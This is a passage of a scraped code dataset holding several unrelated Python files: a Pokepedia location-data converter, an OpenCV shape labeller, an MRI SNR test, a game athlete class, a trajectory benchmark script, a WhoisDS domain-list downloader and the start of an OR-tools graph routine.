-1:\n\t\t\t\t\tzone = None\n\t\t\t\telse:\n\t\t\t\t\tend = line.find(\"|\", beg + 1)\n\t\t\t\t\tzone = line[beg + len(zone_parameter):end]\n\n\t\t\t\tstarted = True\n\n\t\t\t\tsavepath = get_savepath(game)\n\n\t\t\t\tif not savepath is None:\n\t\t\t\t\tif not game in seen_games:\n\t\t\t\t\t\tfile = open(savepath, \"w+\", encoding=\"utf-8\")\n\t\t\t\t\t\tseen_games.add(game)\n\n\t\t\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\t\t\tsavefile.write(\"return {\\n\")\n\t\t\t\t\t\tsavefile.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tans = \",\\n\"\n\n\t\t\t\tif zone is None:\n\t\t\t\t\tzone_add_on = \"\"\n\t\t\t\telse:\n\t\t\t\t\tzone_add_on = \"@\" + zone\n\n\t\t\t\tlocation_full = location_specified + zone_add_on\n\t\t\t\tans = ans + '\\t[\"' + location_full + '\"] = {\\n'\n\n\t\t\t\tif game in locations:\n\t\t\t\t\tlocation_game = locations[game]\n\t\t\t\t\tif location_full in location_game:\n\t\t\t\t\t\twarnings = warnings + \"\\nWARNING: \" + location + \" is present multiple times.\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tlocation_game.append(location_full)\n\t\t\t\telse:\n\t\t\t\t\tlocations[game] = [location_full]\n\n\t\t\telif \"{{#invoke:Tableau Pokémon|antre\" in line:\n\t\t\t\tgame = \"EB\"\n\t\t\t\tstarted_raid = True\n\t\t\t\tzone = None\n\t\t\t\tsavepath = get_savepath(game)\n\n\t\t\t\tif not savepath is None:\n\t\t\t\t\tif not game in seen_games:\n\t\t\t\t\t\tseen_games.add(game)\n\n\t\t\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\t\t\tsavefile.write(\"return {\\n\")\n\t\t\t\t\t\tsavefile.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tans = \",\\n\"\n\n\n\t\t\t\tans = ans + '\\t[\"' + location + '\"] = {\\n'\n\n\t\t\telif \"{{#invoke:Tableau Pokémon|teracristal\" in line:\n\t\t\t\tgame = \"EV\"\n\t\t\t\tstarted_raid = True\n\t\t\t\tzone = None\n\t\t\t\tsavepath = get_savepath(game)\n\n\t\t\t\tif not savepath is 
None:\n\t\t\t\t\tif not game in seen_games:\n\t\t\t\t\t\tfile = open(savepath, \"w+\", encoding=\"utf-8\")\n\t\t\t\t\t\tseen_games.add(game)\n\n\t\t\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\t\t\tsavefile.write(\"return {\\n\")\n\t\t\t\t\t\tsavefile.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tans = \",\\n\"\n\n\n\t\t\t\tans = ans + '\\t[\"' + location + '\"] = {\\n'\n\n\t\t\tcontinue\n\t\t\t\n\n\t\tif (\" / \" in line or line[-1] == \"/\") and not \"nowiki\" in line:\n\t\t\tspecial_info = re.search(r\"taux-journée\\([^\\(]*\\)\", line)\n\t\t\tif not special_info is None:\n\t\t\t\tspecial_info = special_info.group()\n\t\t\t\tspecial_value = special_info[:-1].replace(\"taux-journée(\", \"\")\n\t\t\t\tline = line.replace(special_info, \"taux-matin(\" + special_value + \") taux-jour(\" + special_value + \")\")\n\n\t\t\tl = line.split(\"/\")\n\t\t\tpokemon = l[0].strip() #erasing an eventual last space at the end\n\t\t\tpokemon_set = set(pokemon.split(\", \"))\n\t\t\ti = 1\n\n\t\t\tfor i in range(1, len(l)):\n\t\t\t\tinfo_dict = {}\n\t\t\t\tpokemon_called_list = []\n\t\t\t\tpokemon_called_rate_list = []\n\t\t\t\tpokemon_tmp_set = list(pokemon_set)\n\t\t\t\tpokemon_tmp_set.sort()\n\n\t\t\t\tif not milieu is None:\n\t\t\t\t\tinfo_dict[\"milieu\"] = milieu\n\n\t\t\t\tinfo = re.search(r\"[^\\s]*\\[[^\\]]*\\]\", l[i])\n\t\t\t\tif not info is None:\n\t\t\t\t\tinfo_point = info.group()\n\t\t\t\t\tinfo_type = re.search(r\"[^\\[]*\", info_point).group()\n\t\t\t\t\tif not '(' in info_type:\n\t\t\t\t\t\tinfo_info = re.search(r\"\\[[^\\]]*\\]\", info_point).group()[1:-1]\n\n\t\t\t\t\t\tinfo_dict[info_type] = info_info\n\t\t\t\t\t\t# print(info_type, \"|\", info_info)\n\n\t\t\t\t\t\tif info_type == \"renfort\":\n\t\t\t\t\t\t\tpokemon_called_list = info_info.split(\", \")\n\n\t\t\t\t\t\tl[i] = l[i][:info.span()[0]] + l[i][info.span()[1]:] \t# erase the data we just found\n\n\n\t\t\t\tinfo = re.search(r\"[^\\s]*\\([^\\)]*\\)\", l[i])\n\t\t\t\twhile not info is None:\n\t\t\t\t\tinfo_point = info.group()\n\t\t\t\t\tinfo_type = re.search(r\"[^\\(]*\", info_point).group()\n\t\t\t\t\tinfo_info = re.search(r\"\\([^\\)]*\\)\", info_point).group()[1:-1]\n\n\t\t\t\t\tinfo_dict[info_type] = info_info\n\n\n\t\t\t\t\tl[i] = l[i][info.span()[1]:] \t# erase the data we just found\n\n\t\t\t\t\tinfo = re.search(r\"[^\\s]*\\([^\\)]*\\)\", l[i])\t# search for other data\n\n\t\t\t\t\t# print(info_type, \"|\", info_info)\n\t\t\t\t\tif info_type == \"taux-renfort\":\n\t\t\t\t\t\tpokemon_called_rate_list = info_info.split(\", \")\n\n\t\t\t\tif \"localisations\" in info_dict and info_dict[\"localisations\"] == \"masquer\":\n\t\t\t\t\tprint(\"MASKED in \" + location)\n\t\t\t\t\tcontinue\n\n\t\t\t\tfor pokemon in pokemon_tmp_set:\n\t\t\t\t\tif pokemon in info_dict_dict:\n\t\t\t\t\t\tinfo_dict_dict[pokemon].append(info_dict)\n\t\t\t\t\telse:\n\t\t\t\t\t\tinfo_dict_dict[pokemon] = [info_dict]\n\n\t\t\t\tif pokemon_called_list != []:\n\t\t\t\t\tinfo_dict_copy = info_dict.copy()\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdel info_dict_copy[\"renfort\"]\n\t\t\t\t\t\tdel info_dict_copy[\"taux-renfort\"]\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\t()\n\n\t\t\t\t\tfor j in range(len(pokemon_called_list)):\n\t\t\t\t\t\tpokemon_called = pokemon_called_list[j]\n\n\t\t\t\t\t\tif not pokemon_called in pokemon_tmp_set:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tfor k in range(len(pokemon_tmp_set)):\n\t\t\t\t\t\t\t\tpokemon_k = pokemon_tmp_set[k]\n\t\t\t\t\t\t\t\tif \"(\" in 
pokemon_k:\n\t\t\t\t\t\t\t\t\tpokemon_k_without_parentheses = re.sub(r\" [^ ]*\\(.*\", \"\", pokemon_k)\n\n\t\t\t\t\t\t\t\t\tif \"nom(\" in pokemon_k:\n\t\t\t\t\t\t\t\t\t\tname_indix = re.search(r\"nom\\(\", pokemon_k).span()[1]\n\t\t\t\t\t\t\t\t\t\tform_name = pokemon_k[name_indix:pokemon_k.find(\")\", name_indix)]\n\n\t\t\t\t\t\t\t\t\t\tpokemon_tmp_set[k] = pokemon_k_without_parentheses + \" \" + form_name\n\n\t\t\t\t\t\t\t\t\telif \"forme(\" in pokemon_k:\n\t\t\t\t\t\t\t\t\t\tname_indix = re.search(r\"forme\\(\", pokemon_k).span()[1]\n\t\t\t\t\t\t\t\t\t\tform_name = pokemon_k[name_indix:pokemon_k.find(\")\", name_indix)]\n\n\t\t\t\t\t\t\t\t\t\tform_string = \" forme \" + form_name\n\t\t\t\t\t\t\t\t\t\tif form_name == \"Alola\":\n\t\t\t\t\t\t\t\t\t\t\tform_string = \" d'Alola\"\n\n\t\t\t\t\t\t\t\t\t\tpokemon_tmp_set[k] = pokemon_k_without_parentheses + form_string\n\n\t\t\t\t\t\t\tpokemon_str = pokemon_tmp_set[0]\n\t\t\t\t\t\t\tif len(pokemon_tmp_set) >= 2:\n\t\t\t\t\t\t\t\tfor k in range(1, len(pokemon_tmp_set) - 1):\n\t\t\t\t\t\t\t\t\tpokemon_tmp_set_k = pokemon_tmp_set[k]\n\t\t\t\t\t\t\t\t\tpokemon_str\t+= \", \" + pokemon_tmp_set_k\n\t\t\t\t\t\t\t\tpokemon_str += \" et \" + pokemon_tmp_set[-1]\n\n\t\t\t\t\t\t\tinfo_dict_copy[\"milieu\"] = milieu + \" – appelé en renfort par \" + pokemon_str\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tinfo_dict_copy[\"taux\"] = pokemon_called_rate_list[j]\n\t\t\t\t\t\t\texcept IndexError:\n\t\t\t\t\t\t\t\tinfo_dict_copy[\"taux\"] = \"100\"\n\n\t\t\t\t\t\t\tif pokemon_called in info_dict_dict:\n\t\t\t\t\t\t\t\tinfo_dict_dict[pokemon_called].append(info_dict_copy)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tinfo_dict_dict[pokemon_called] = [info_dict_copy]\n\n\n\t\telif line == \"\":\n\t\t\tcontinue\n\n\t\telif (started or started_raid) and line[:2] == \"}}\":\n\t\t\t# Reconstruction of the dicts\n\t\t\ttmp_ans = \"\"\n\t\t\tfor pokemon, info_dicts in info_dict_dict.items():\n\t\t\t\tfirst_dict = True\n\t\t\t\tfor info_dict in info_dicts:\n\t\t\t\t\tif first_dict:\n\t\t\t\t\t\ttmp_ans = '\\t\\t[\"' + pokemon + '\"] = {{'\n\t\t\t\t\t\tfirst_dict = False\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_ans = tmp_ans + \",\\n\\t\\t\\t{\"\n\n\t\t\t\t\tfirst_item = True\n\t\t\t\t\tfor key, item in info_dict.items():\n\t\t\t\t\t\tif first_item:\n\t\t\t\t\t\t\tfirst_item = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttmp_ans = tmp_ans + \", \"\n\t\t\t\t\t\ttmp_ans = tmp_ans + '[\"' + key + '\"] = \"' + item + '\"'\n\t\t\t\t\ttmp_ans = tmp_ans + \"}\"\n\t\t\t\ttmp_ans = tmp_ans + \"}\"\n\n\t\t\t\tif first_line:\n\t\t\t\t\tfirst_line = False\n\t\t\t\telse:\n\t\t\t\t\tans = ans + \",\\n\"\n\t\t\t\tans = ans + tmp_ans\n\t\t\tans = ans + \"\\n\\t}\"\n\n\t\t\tif not savepath is None:\n\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\tsavefile.write(ans)\n\t\t\t\tsavefile.close()\n\n\t\t\t# print(\"** \" + game + \" **\")\n\t\t\t# print(location + \" ok\")\n\t\t\t# print(\"\")\n\n\t\t\t#Reset if there is a new module in the page\n\t\t\tans = \"\"\n\t\t\tmilieu = None\n\t\t\tstarted = False\n\t\t\tstarted_raid = False\n\t\t\tfirst_line = True\n\t\t\tinfo_dict_dict = {}\n\n\t\telse:\n\t\t\tmilieu = line[:-1] # split on the comma and the double comma\n\n\n\t\t\t#while\n\t\t\t()\n\n\tfile.close()\n\nfor game in seen_games:\n\tsavepath = get_savepath(game)\n\tif not savepath is None:\n\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\tsavefile.write(\"\\n}\")\n\t\tsavefile.close()\n\nif warnings == 
\"\":\n\tprint(\"No warnings.\")\nelse:\n\tprint(warnings)\n\n# Initial directory cleaning\nif True:\n\tdirectory = \"dumps/locdump/\"\n\ttry:\n\t\tif not os.path.exists(directory):\n\t\t\tos.makedirs(directory)\n\t\telse:\n\t\t\tfiles = [glob.glob(directory + \"*.txt\", recursive=True)]\n\n\t\t\tfor d in files:\n\t\t\t\tfor f in d:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tos.remove(f)\n\t\t\t\t\texcept OSError as e:\n\t\t\t\t \t\tprint(\"Error: %s : %s\" % (f, e.strerror))\n\n\texcept OSError as e:\n\t\tprint(e.strerror)\n","repo_name":"GaletteLithium/pokepedia","sub_path":"locdata_converter.py","file_name":"locdata_converter.py","file_ext":"py","file_size_in_byte":10785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29727597875","text":"import cv2 as cv\n\ndef setLabel(image, str, contour):\n (text_width, text_height), baseline = cv.getTextSize(str, cv.FONT_HERSHEY_SIMPLEX, 0.7, 1)\n x,y,width,height = cv.boundingRect(contour)\n pt_x = x+int((width-text_width)/2)\n pt_y = y+int((height + text_height)/2)\n cv.rectangle(image, (pt_x, pt_y+baseline), (pt_x+text_width, pt_y-text_height), (200,200,200), cv.FILLED)\n cv.putText(image, str, (pt_x, pt_y), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 1, 8)\n\n\nimg_color = cv.imread('test.png', cv.IMREAD_COLOR)\ncv.imshow('result', img_color)\ncv.waitKey(0)\n\nimg_gray = cv.cvtColor(img_color, cv.COLOR_BGR2GRAY)\ncv.imshow('result', img_gray)\ncv.waitKey(0)\n\nret,img_binary = cv.threshold(img_gray, 127, 255, cv.THRESH_BINARY_INV|cv.THRESH_OTSU)\ncv.imshow('result', img_binary)\ncv.waitKey(0)\n\ncontours, hierarchy = cv.findContours(img_binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\nfor cnt in contours:\n size = len(cnt)\n print(size)\n\n epsilon = 0.005 * cv.arcLength(cnt, True)\n approx = cv.approxPolyDP(cnt, epsilon, True)\n\n size = len(approx)\n print(size)\n\n cv.line(img_color, tuple(approx[0][0]), tuple(approx[size-1][0]), (0, 255, 0), 3)\n for k in range(size-1):\n cv.line(img_color, tuple(approx[k][0]), tuple(approx[k+1][0]), (0, 255, 0), 3)\n\n if cv.isContourConvex(approx):\n if size == 3:\n setLabel(img_color, \"triangle\", cnt)\n elif size == 4:\n setLabel(img_color, \"rectangle\", cnt)\n elif size == 5:\n setLabel(img_color, \"pentagon\", cnt)\n elif size == 6:\n setLabel(img_color, \"hexagon\", cnt)\n elif size == 8:\n setLabel(img_color, \"octagon\", cnt)\n elif size == 10:\n setLabel(img_color, \"decagon\", cnt)\n else:\n setLabel(img_color, str(size), cnt)\n else:\n setLabel(img_color, str(size), cnt)\n\ncv.imshow('result', img_color)\ncv.waitKey(0)\n","repo_name":"webnautes/nudapeu","sub_path":"1296-1.py","file_name":"1296-1.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"66"} +{"seq_id":"22153483164","text":"import Poirot\nimport SimpleITK as sitk\n\n\"\"\"Poirot test with fake data\n1. Instantiate Poirot SNR\n1. Set the metric reference in this case a fake SNR\n1. set the ultimate SNR\n1. set the transform between the two spaces (here is faked)\n1. 
request the output\n\"\"\"\n\n\nmetricMASK='/data/PROJECTS/POIROT/python/testdata/EM_MASK.nii.gz'\nmetric='/data/PROJECTS/POIROT/python/testdata/_FieldSNR.nii.gz'\n\nUXMASK='/data/PROJECTS/POIROT/python/testdata/UISNR_MASK.nii.gz'\nUX='/data/PROJECTS/POIROT/python/testdata/UISNR.nii.gz'\n\nfrom myPy import im\n\n#mask registration\nmMask=im.Imaginable()\nmMask.setInputFileName(metricMASK)\n\nuxMask=im.Imaginable()\nuxMask.setInputFileName(UXMASK)\n\nr=Poirot.MaskRegistration(mMask,uxMask)\n\n# initT=r.transformInitializerGuessRotation()\nr.register()\nT=r.getTransform()\n\n\n\np=Poirot.PoirotSNR()\np.setMetric(metric)\np.setUX(UX)\ndimension = 3\np.setTransform(T)\nO=p.getOutput()\nO.writeImageAs('./testdata/Perf.nii.gz')\nO.writeImageAs('./testdata/Perf.mha')\n\n","repo_name":"cloudmrhub-com/PerformanceMaster","sub_path":"test_04_Poirot.py","file_name":"test_04_Poirot.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2178920511","text":"from parametros import (\r\n MINIMO_ATRIBUTO_DEPORTISTA,\r\n MAXIMO_ATRIBUTO_DEPORTISTA,\r\n PUNTOS_ENTRENAMIENTO,\r\n PONDERADOR_ENTRENAMIENTO_IEEE\r\n )\r\n\r\n\r\nclass Deportista:\r\n\r\n def __init__(self, nombre, vel, res, flex, moral, lesion, precio):\r\n self.nombre = nombre # str\r\n self._velocidad = vel # int\r\n self._resistencia = res # int\r\n self._flexibilidad = flex # int\r\n self._moral = moral # int\r\n self._lesionado = lesion # bool\r\n self.precio = precio # int\r\n\r\n @property\r\n def lesionado(self):\r\n if self._lesionado == \"True\":\r\n return True\r\n if self._lesionado == \"False\":\r\n return False\r\n return self._lesionado\r\n\r\n @property\r\n def velocidad(self):\r\n return self._velocidad\r\n\r\n @velocidad.setter\r\n def velocidad(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._velocidad = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._velocidad = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._velocidad = mejora\r\n\r\n @property\r\n def resistencia(self):\r\n return self._resistencia\r\n\r\n @resistencia.setter\r\n def resistencia(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._resistencia = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._resistencia = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._resistencia = mejora\r\n\r\n @property\r\n def flexibilidad(self):\r\n return self._flexibilidad\r\n\r\n @flexibilidad.setter\r\n def flexibilidad(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._flexibilidad = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._flexibilidad = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._flexibilidad = mejora\r\n\r\n @property\r\n def moral(self):\r\n return self._moral\r\n\r\n @moral.setter\r\n def moral(self, mejora):\r\n if mejora < MINIMO_ATRIBUTO_DEPORTISTA:\r\n self._moral = MINIMO_ATRIBUTO_DEPORTISTA\r\n elif mejora > MAXIMO_ATRIBUTO_DEPORTISTA:\r\n self._moral = MAXIMO_ATRIBUTO_DEPORTISTA\r\n else:\r\n self._moral = mejora\r\n\r\n def entrenar(self, atributo, ponderador):\r\n if atributo == 0:\r\n if self.velocidad == MAXIMO_ATRIBUTO_DEPORTISTA:\r\n print(\"Este atributo ya esta al maximo\")\r\n else:\r\n if ponderador:\r\n self.velocidad += (PUNTOS_ENTRENAMIENTO * PONDERADOR_ENTRENAMIENTO_IEEE)\r\n else:\r\n self.velocidad += PUNTOS_ENTRENAMIENTO\r\n elif atributo == 1:\r\n if self.resistencia == 
MAXIMO_ATRIBUTO_DEPORTISTA:\r\n                print(\"Este atributo ya esta al maximo\")\r\n            else:\r\n                if ponderador:\r\n                    self.resistencia += (PUNTOS_ENTRENAMIENTO * PONDERADOR_ENTRENAMIENTO_IEEE)\r\n                else:\r\n                    self.resistencia += PUNTOS_ENTRENAMIENTO\r\n        elif atributo == 2:\r\n            if self.flexibilidad == MAXIMO_ATRIBUTO_DEPORTISTA:\r\n                print(\"Este atributo ya esta al maximo\")\r\n            else:\r\n                if ponderador:\r\n                    self.flexibilidad += (PUNTOS_ENTRENAMIENTO * PONDERADOR_ENTRENAMIENTO_IEEE)\r\n                else:\r\n                    self.flexibilidad += PUNTOS_ENTRENAMIENTO\r\n\r\n    def lesionarse(self):\r\n        # Write the backing field: the 'lesionado' property defines no setter,\r\n        # so assigning through the property would raise AttributeError.\r\n        self._lesionado = True\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    pass\r\n","repo_name":"stgo32/IIC2233-2020-2","sub_path":"Tareas/T01/deportistas.py","file_name":"deportistas.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72408442769","text":"import os\nimport glob\nimport pandas as pd\npd.options.display.float_format = '{:.3f}'.format\nimport argparse\n\ndef parse_args():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--dataset\",\n\t                    type=str,\n\t                    default=None)\n\tparser.add_argument(\"--weight\",\n\t                    type=float,\n\t                    default=None)\n\tparser.add_argument(\"--epoch_min\",\n\t                    type=int,\n\t                    default=100)\n\tparser.add_argument(\"--epoch_max\",\n\t                    type=int,\n\t                    default=300)\n\tparser.add_argument(\"--window_best\",\n\t                    type=int,\n\t                    default=5)\n\targs = parser.parse_args()\n\treturn args\n\ndef load_dataframe(fname, ckpt):\n\tcolnames=['Epoch', 'Seed', 'ADE', 'FDE', 'COL']\n\tdf = pd.read_csv(fname, header=None, names=colnames, usecols=[0,1,2,3,4])\n\tdf = df.drop_duplicates(subset=['Epoch', 'Seed'], keep='last')\n\tdf = df[df['Epoch'].isin(ckpt)]\n\t# seed_list = [123]\n\t# df = df[df['Seed'].isin(seed_list)]\n\tdf.reset_index(drop=True, inplace=True)\n\tdf = df.astype({\"Epoch\": int, \"Seed\": int})\n\treturn df\n\ndef relative(df_baseline, df_candidate):\n\tgain_ade = (df_baseline['ADE'] - df_candidate['ADE']) / (df_baseline['ADE'] + 1e-8)\n\tgain_fde = (df_baseline['FDE'] - df_candidate['FDE']) / (df_baseline['FDE'] + 1e-8)\n\tgain_col = (df_baseline['COL'] - df_candidate['COL']) / (df_baseline['COL'] + 1e-8)\n\treturn gain_ade, gain_fde, gain_col\n\ndef select(df, window):\n\tindex_best = (df['ADE'] + df['FDE'] + df['COL']).argmin()\n\t# local window\n\tindex_min = index_best - (window - 1) // 2\n\tindex_max = index_min + window\n\tif index_min < 0:\n\t\tindex_min = 0\n\t\tindex_max = window\n\tif index_max > df.shape[0] - 1:\n\t\tindex_max = df.shape[0]\n\t\tindex_min = index_max - window\n\treturn index_best, (index_min, index_max)\n\ndef compare(foldername, args):\n\n\tepoch_list = [epoch for epoch in range(args.epoch_min, args.epoch_max + 10, 10)]\n\n\tfilevanilla = glob.glob(os.path.join(foldername, '*_0.0000.csv'))[0]\n\tdf_vanilla = load_dataframe(filevanilla, epoch_list)\n\n\tif args.weight:\n\n\t\tfilename = glob.glob(os.path.join(foldername, '*_{:.4f}.csv'.format(args.weight)))[0]\n\t\tdf_snce = load_dataframe(filename, epoch_list)\n\n\t\tprint('\\n----- Detailed Summary -----\\n')\n\t\tprint('Vanilla:\\n', df_vanilla)\n\t\tprint('')\n\t\tprint('SNCE:\\n', df_snce)\n\n\t\tprint('\\n----- Avg of {:d} Seeds -----\\n'.format(len(df_snce['Seed'].unique())))\n\t\tprint('Vanilla:')\n\t\tprint(df_vanilla.mean())\n\t\tprint('')\n\t\tprint('SNCE:')\n\t\tprint(df_snce.mean())\n\n\telse:\n\t\tflist = glob.glob(os.path.join(foldername, '*.csv'))\n\t\tflist.sort(key=lambda filename: 
float(filename.split('_')[-1][:-4]))\n\t\tflist.remove(filevanilla)\n\n\t\tprint(\" \\t \\t \\tAverage \\t \\t Gain \\t \\t \\t \\t Best \\t \\t \\t Gain \")\n\t\tprint(\" \\t \\t ---------------------\\t --------------------- \\t \\t -----------------------------\\t ---------------------\")\n\t\tprint(\"Method \\tWeight\\t ADE \\t FDE \\t COL \\t ADE \\t FDE \\t COL \\t \\t Epoch \\t ADE \\t FDE \\t COL \\t ADE \\t FDE \\t COL \")\n\n\t\tidx_best_vanilla, window_best_vanilla = select(df_vanilla, args.window_best)\n\t\tbest_vanilla = df_vanilla.iloc[idx_best_vanilla, :]\n\t\tavg_vanilla = df_vanilla.iloc[window_best_vanilla[0]:window_best_vanilla[1], :].mean()\n\n\t\tprint(\"Vanilla\\t 0.00 \\t {:.3f} \\t {:.3f} \\t {:.3f} \\t x \\t x \\t x \\t \\t {:.0f} \\t {:.3f} \\t {:.3f} \\t {:.3f} \\t x \\t x \\t x\".format(avg_vanilla['ADE'], avg_vanilla['FDE'], avg_vanilla['COL'] * 100, best_vanilla['Epoch'], best_vanilla['ADE'], best_vanilla['FDE'], best_vanilla['COL'] * 100))\n\n\t\tmetric_vanilla = (avg_vanilla['ADE'], avg_vanilla['FDE'], avg_vanilla['COL'])\n\t\tmetric_snce = (float('inf'), float('inf'), float('inf'))\t# FDE & COL\n\t\tweight_snce = float('nan')\n\n\t\tfor filename in flist:\n\n\t\t\tweight = float(filename.split('_')[-1][:-4])\n\t\t\tdf_snce = load_dataframe(filename, epoch_list)\n\n\t\t\tidx_best_snce, window_best_snce = select(df_snce, args.window_best)\n\t\t\tbest_snce = df_snce.iloc[idx_best_snce, :]\n\t\t\tavg_snce = df_snce.iloc[window_best_snce[0]:window_best_snce[1], :].mean()\n\n\t\t\tgain_best_ade, gain_best_fde, gain_best_col = relative(best_vanilla, best_snce)\n\t\t\tgain_avg_ade, gain_avg_fde, gain_avg_col = relative(avg_vanilla, avg_snce)\n\n\t\t\tprint(\"S-NCE \\t {:.3f}\\t {:.3f} \\t {:.3f} \\t {:.3f} \\t {:.1f}%\\t {:.1f}%\\t {:.1f}% \\t {:.0f} \\t {:.3f} \\t {:.3f} \\t {:.3f} \\t {:.1f}%\\t {:.1f}%\\t {:.1f}%\".format(weight, avg_snce['ADE'], avg_snce['FDE'], avg_snce['COL'] * 100, gain_avg_ade * 100, gain_avg_fde * 100, gain_avg_col * 100, best_snce['Epoch'], best_snce['ADE'], best_snce['FDE'], best_snce['COL'] * 100, gain_best_ade * 100, gain_best_fde * 100, gain_best_col * 100))\n\n\t\t\tif metric_snce[0] + metric_snce[1] + metric_snce[2] * 100 > avg_snce['ADE'] + avg_snce['FDE'] + avg_snce['COL'] * 100:\n\t\t\t\tmetric_snce = (avg_snce['ADE'], avg_snce['FDE'], avg_snce['COL'])\n\t\t\t\tweight_snce = weight\n\n\t\tprint('Optimal Weight:', weight_snce, '\\n')\n\n\t\treturn metric_vanilla, metric_snce\n\ndef main():\n\targs = parse_args()\n\n\tif args.dataset is None:\n\t\tresult = list()\n\t\tfor dataset in ['eth', 'hotel', 'univ', 'zara1', 'zara2']:\n\t\t\tprint(\"Dataset:\", dataset)\n\t\t\tfoldername = 'experiments/pedestrians/models/snce_' + dataset + '_vel'\n\t\t\t(ade_vanilla, fde_vanilla, col_vanilla), (ade_snce, fde_snce, col_snce) = compare(foldername, args)\n\t\t\tresult.append([dataset, ade_vanilla, fde_vanilla, col_vanilla * 100, ade_snce, fde_snce, col_snce * 100, (1 - col_snce / col_vanilla) * 100 ])\n\t\tdf = pd.DataFrame(result, columns=['Dataset', 'ADE-Vanilla', 'FDE-Vanilla', 'COL-Vanilla', 'ADE-SNCE', 'FDE-SNCE', 'COL-SNCE', 'COL-Gain']).set_index('Dataset')\n\t\tdf.loc['Avg'] = df.mean()\n\t\tprint(df)\n\telse:\n\t\tprint(\"Dataset:\", args.dataset)\n\t\tfoldername = 'experiments/pedestrians/models/snce_' + args.dataset + '_vel'\n\t\tcompare(foldername, args)\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"YuejiangLIU/social-nce-trajectron-plus-plus","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"66"} +{"seq_id":"24875480778","text":"import base64\nfrom datetime import date, datetime, timedelta\nfrom io import BytesIO\nfrom zipfile import ZipFile\n\nfrom spotter import Spotter\n\n\nclass WhoisDs(Spotter):\n\n URL = 'https://whoisds.com//whois-database/newly-registered-domains'\n\n def get(self):\n latest_list = []\n past = datetime.strftime(self.now - timedelta(self.config['whoisds']['check-interval']['days']), \"%Y-%m-%d\")\n\n filename = \"{}.zip\".format(past)\n encoded_filename = base64.b64encode(filename.encode('utf-8'))\n \n response = self.session.get('{url}/{file_name}/nrd'.format(url=self.URL, file_name=encoded_filename.decode('ascii')))\n with BytesIO(response.content) as zip_file:\n with ZipFile(zip_file) as zip_file:\n for zip_info in zip_file.infolist():\n with zip_file.open(zip_info) as ffile:\n for line in ffile.readlines():\n latest_list.append(str(line, 'utf-8').rstrip())\n\n return latest_list","repo_name":"fu3l3dSecurity/trawl","sub_path":"spotter/spotter/whoisds.py","file_name":"whoisds.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"3026544966","text":"import pandas as pd\nfrom ortools.sat.python import cp_model\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nfrom itertools import chain\n\ndef read_data(filePath, mode):\n numNodes = 0\n file = open(filePath, mode)\n line = file.readline().strip()\n numNodes = int(line)\n graph = [ [0]*numNodes for i in range(numNodes)]\n edges = []\n # Last line is an empty string.\n while line != ['']:\n line = file.readline().strip().split(\" \")\n try:\n src = int(line[0])\n dest = int(line[1])\n weight = int(line[2])\n if graph[src][dest] == 0 and graph[dest][src] == 0:\n graph[src][dest] = weight\n graph[dest][src] = weight\n edges.append((src,dest,weight))\n edges.append((dest,src,weight))\n except ValueError:\n # Last line.\n break\n return (numNodes, graph,edges)\n\n\n\ndef create_data_model():\n data = {}\n n,graph,edges = read_data(\"agraph\",'r+')\n data['distance_matrix'] = graph\n data['num_vehicles'] = 1\n data['depot'] = 0\n print(\" 0 \\t 1\\t 2\\t 3\\t 4\\t 5\\t 6\\t 7\\t 8\\t 9\\t 10\\t 11\\t 12\\t 13 \\t 14\\t\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------------\")\n for i in 